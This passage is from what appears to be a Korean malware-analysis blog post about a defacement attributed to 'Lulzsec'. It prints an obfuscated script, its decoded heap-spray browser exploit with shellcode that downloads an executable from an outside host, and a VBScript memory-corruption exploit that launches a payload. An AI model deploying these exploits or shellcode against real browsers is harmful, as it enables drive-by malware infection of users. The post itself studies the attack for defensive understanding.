ad1212gnodad9CD2gnodadAA9Dgnodad1212gnodad8A22gnodad129Cgnodad1212gnodad9C11gnodad1212gnodad5602gnodad129Cgnodad1212gnodad9C30gnodadAA9Dgnodad1212gnodadAF22gnodad129Cgnodad1212gnodad9C76gnodad1212gnodadC602gnodad129Cgnodad1212gnodad9C91gnodadAA9Dgnodad1212gnodadC122gnodadED9CgnodadEDEDgnodad9C7DgnodadED1Fgnodad2D58gnodad42F7gnodad9DACgnodad12AAgnodad1312gnodad8912gnodadED1FgnodadB412gnodad1212gnodad1210gnodad1294gnodad2212gnodad9C71gnodad2EAFgnodad1204gnodad0803gnodad56AFgnodad189Egnodad9C66gnodad3C13gnodadC130gnodadBD3Bgnodad8533gnodad8585gnodad4285gnodad9D43gnodad9D1Egnodad0909gnodad0909gnodad""+1a+""0909""+1a(yarpsมี;""gnodad""=1a ravมีมี}มีlaVter nruterมี;)2/gnolzs,0(gnirtsbus.laVter=laVterมี}laVter=+laVter{มี)gnolzs<2*htgnel.laVter(elihwมี{มี)gnolzs,laVter(eulaVelpmaSteg noitcnufมีมี}มี}tcefni+laVter=]i[kcuhczz{)++i;klbaaa<i;0=i(rofมี;)(yarrA wen=kcuhczzมี;eziSkcolBpaeh/)000001x0-a0a0a0a0x0(=klbaaaมี;)gnolzs,laVter(eulaVelpmaSteg=laVterมี;)""a0a0u%a0a0u%""(epacsenu=laVter ravมี;)830x0+eziSdaoLyap(-eziSkcolBpaeh=gnolzs ravมี;2*htgnel.tcefni=eziSdaoLyap ravมี;000001x0=eziSkcolBpaeh ravมี;))""57x52x"",g/gnodad/(ecalper.cs(epacsenu=tcefni ravมี{มี)cs(yarps noitcnufมีมี}มี}มี}kaerb{มี)sdnocesillim>)trats-)(emiTteg.)(etaD wen((fi{มี)++i;7e1<i;0=i rav(rofมีมี;)(emiTteg.)(etaD wen=trats ravมี{มี)sdnocesillim(peels noitcnufมีมี;)""exe.88psa/moc.22kwfhs.88dsa//:ptth""(ecalper.noitacol)1-==)""7 eism""(fOxedni.)(esaCrewoLot.tnegAresu.rotagivan(fiมี>""tpircsavaj""=egaugnal tpircs<"
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<>"มี" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(wei))
</SCRIPT>

위 코드를 난독화를 해제하면 아래와 같습니다.

<script language="javascript">if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("http://asd88.shfwk22.com/asp88.exe");
 function sleep(milliseconds)
 {
   var start=new Date().getTime();
   for(var i=0;i<1e7;i++)
   {
     if((new Date().getTime()-start)>milliseconds)
     {
       break
     }
   }
 }
 function spray(sc)
 {
   var infect=unescape(sc.replace(/dadong/g,"x25x75"));
   var heapBlockSize=0x100000;
   var payLoadSize=infect.length*2;
   var szlong=heapBlockSize-(payLoadSize+0x038);
   var retVal=unescape("%u0a0a%u0a0a");
   retVal=getSampleValue(retVal,szlong);
   aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
   zzchuck=new Array();
   for(i=0;i<aaablk;i++)
   {
     zzchuck[i]=retVal+infect
   }
 }
 function getSampleValue(retVal,szlong)
 {
   while(retVal.length*2<szlong)
   {
     retVal+=retVal
   }
   retVal=retVal.substring(0,szlong/2);
   return retVal
 }
 var a1="dadong";
 spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021");
 sleep(3000);
 nav=navigator.userAgent.toLowerCase();
 if(navigator.appVersion.indexOf('MSIE')!=-1)
 {
   version=parseFloat(navigator.appVersion.split('MSIE')[1])
 }
 if(version==7)
 {
   w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
   wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
   if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.book.com src="http://asd88.shfwk22.com/asp88.exe"]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
   var i=1;
   while(i<=10)
   {
     window.status=" ";
     i++
   }
 }
 </script></script><span id="sp1"><IMG SRC="wm.gif" onload="ev1(event)"></span></body></html>

위 코드는 CVE-2010-1175 취약점 입니다. 그리고 아래 일부 코드는 과거 오로라로 명칭 되었던 CVE-2010-0249 취약점 코드의 일부도 보입니다.
제 생각으로는 그냥 이것저것 막 주워다 쓴게 아닐까 추측합니다…

또한 두번째 참고사이트 Kwan’s blog 글을 보시면 동일한 코드가 나오며 실행되는 악성코드 파일명은 svchost.exe임을 알 수 있습니다.

[참고 사이트]
o CVE-2010-1175(Exploit-DB) : http://www.exploit-db.com/exploits/35229/
o Kwan’s blog : http://power4247.tistory.com/m/post/253

4. CVE-2014-6322 취약점?

이 부분은 그냥 공개된 POC 코드(http://www.exploit-db.com/exploits/35229/)를 그대로 옮겨쓴 코드로 실제 악성행위는 하지 않습니다.
일부 언론에서는 Lulzsec이 국내 사이트들을 공격 후 해당 취약점으로 악성코드를 유포 했다고 기사를 썼으나 제가 분석한 코드에서는 해당 취약점이 아닌 3번의 CVE-2010-1175 코드로 인해 악성코드가 유포 되었을걸로 보입니다.
혹은 제가 보고 있는 샘플이 당시의 샘플이 아닐수도 있지만 난데없이 svchost.exe가 나온걸로 봐서는 위 3번에서 설명한 바와 같이 여기저기서 코드를 가져다 쓰면서 그냥 넣은것이 아닐까 추측됩니다.

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "svchost.exe"
end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
  else
     exit   function

  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                  
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)   
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redim  Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0        
              redim  Preserve aa(a2)           
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)

     j=0
              j=readmemo(i+&h120+k) 

               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim  Preserve aa(a0)
    redim   ab(a0)   

    redim  Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16           
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then  
                 If(IsObject(aa(a1)) = False ) Then           
                   type1=VarType(aa(a1))
                 end if             
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then  
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if             
            end if
        end if
    end if

    If(type1=&h2f66) Then       
          Over=True    
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)        

end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0 
    aa(a1)=add+4   
    ab(0)=1.69759663316747E-313     
    ReadMemo=lenb(aa(a1))

    ab(0)=0  

    redim  Preserve aa(a0)
end function`

</script>

5. 그 이외 부분 및 결론

그 이외 부분은 확인한 결과 어나니머스가 사용하던 코드를 그대로 가져와서 꾸민것으로 보였습니다. 즉, 그냥 어린 친구들이 장난한 것으로 보이네요. 공부삼아 분석하였으며 틀린 부분이 있으면 댓글 부탁 드립니다. 그럼 이만 ~

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다